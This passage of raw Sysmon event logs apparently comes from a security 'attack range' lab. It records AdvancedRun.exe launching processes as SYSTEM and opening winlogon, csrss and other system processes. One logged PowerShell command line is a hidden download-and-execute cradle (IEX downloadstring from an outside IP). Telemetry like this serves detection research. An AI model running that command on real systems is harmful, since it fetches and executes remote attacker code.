tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004075880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.490{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004075380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.077{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004075373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.073{834264DD-1435-61EB-7C08-000000002702}4360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "/c "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))"""C:\Windows\System32\NT 
AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004075372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.072{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.071{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.071{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.071{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004075336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075330Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\A